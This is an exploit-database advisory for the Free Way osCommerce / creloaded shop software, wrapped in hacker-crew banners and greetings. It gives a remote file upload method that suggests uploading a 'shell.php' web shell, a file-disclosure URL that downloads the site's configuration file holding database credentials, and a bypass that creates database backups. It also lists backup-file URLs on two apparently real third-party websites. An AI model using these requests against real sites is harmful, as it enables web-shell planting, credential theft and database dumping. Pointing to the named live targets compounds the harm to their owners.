======================================================== Free Way osCommerce Remote File Upload / File Disclosure ======================================================== 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=0 0 _ ____ ____ _____ __ _____ __ __ 1 1 _| | |__ | |__ | |___ | | | | _ | \ \ / / 0 0 |_ | __| | _| | / / | | | |_| | \ \/ / 1 1 | | |__ | |__ | / / __| | | _ | / / 0 0 | | __| | __| | / / / _ | | | | | / / 1 1 |_| |____| |____| /_/ / [_] | | | | | / / 0 0 Site:1337day.com /_______| |_| |_|/__/ 1 1 Support e-mail : submit[at]inj3ct0r.com 0 0 >> Exploit database separated by exploit 1 1 type (local, remote, DoS, etc.) 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=1 ####################################################### # Vendor: http://www.zac-ware.com/ # Author : indoushka +++=[ Dz Offenders Cr3w ]=+++ # KedAns-Dz * Caddy-Dz * Kalashinkov3 # Jago-dz * Kha&miX * T0xic * Ev!LsCr!pT_Dz # Contact : ind0ushka@hotmail.com # Tested on : win SP2 + SP3 Fr / Back | Track 5 fr ######################################################################## # Exploit By indoushka ------------- creloaded - Remote File Upload

UPLOAD FILE:


CREATE FILE:
FILE NAME:
  (ex. shell.php)
FILE CONTENTS:
# File Disclosure : in : admin/shop_file_manager.php/login.php?action=download&filename= Exploit : admin/shop_file_manager.phpp/login.php/login.php?action=download&filename=/includes/_includes_configure.php Example : http://[site]/[path]/admin/shop_file_manager.php/login.php/login.php?action=download&filename=/includes/_includes_configure.php By pass Creat Download Backup : http://jumpingfiestarentals.com/admin/backups/db_freewaydb3-20111019144921.sql https://secure.superc.com.au/admin/shop_backup.php/login.php?action=backupnow Dz-Ghost Team ===== Saoucha * Star08 * Cyber Sec * theblind74 * XproratiX * onurozkan * n2n * Meher Assel =========================== special thanks to : r0073r (inj3ct0r.com) * L0rd CruSad3r * MaYur * MA1201 * KeDar * Sonic * gunslinger_ * SeeMe * RoadKiller Sid3^effects * aKa HaRi * His0k4 * Hussin-X * Rafik * Yashar * SoldierOfAllah * RiskY.HaCK * Stake * r1z * D4NB4R * www.alkrsan.net ThE g0bL!N * AnGeL25dZ * ViRuS_Ra3cH * Sn!pEr.S!Te * ViRuS_HiMa * KedAns-Dz * Over-X --------------------------------------------------------------------------------------------------------------------------------------